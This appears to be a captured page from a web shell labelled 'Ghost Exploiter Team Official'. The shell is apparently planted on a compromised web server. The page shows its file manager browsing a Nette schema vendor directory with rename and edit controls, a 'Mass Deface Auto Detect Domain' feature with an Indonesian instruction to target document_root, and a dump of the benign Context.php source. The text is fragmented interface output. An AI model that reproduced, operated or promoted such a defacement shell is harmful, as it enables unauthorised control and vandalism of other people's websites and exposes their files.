Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
nette
/
schema
/
src
/
Schema
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Elements
--
ren
Context.php
1.057KB
edt
ren
DynamicParameter.php
0.217KB
edt
ren
Expect.php
2.728KB
edt
ren
Helpers.php
5.101KB
edt
ren
Message.php
2.743KB
edt
ren
Processor.php
1.896KB
edt
ren
Schema.php
0.572KB
edt
ren
ValidationException.php
0.835KB
edt
ren
<?php /** * This file is part of the Nette Framework (https://nette.org) * Copyright (c) 2004 David Grudl (https://davidgrudl.com) */ declare(strict_types=1); namespace Nette\Schema; use function count; final class Context { public bool $skipDefaults = false; /** @var string[] */ public array $path = []; public bool $isKey = false; /** @var Message[] */ public array $errors = []; /** @var Message[] */ public array $warnings = []; /** @var array[] */ public array $dynamics = []; public function addError(string $message, string $code, array $variables = []): Message { $variables['isKey'] = $this->isKey; return $this->errors[] = new Message($message, $code, $this->path, $variables); } public function addWarning(string $message, string $code, array $variables = []): Message { return $this->warnings[] = new Message($message, $code, $this->path, $variables); } /** @return \Closure(): bool */ public function createChecker(): \Closure { $count = count($this->errors); return fn(): bool => $count === count($this->errors); } }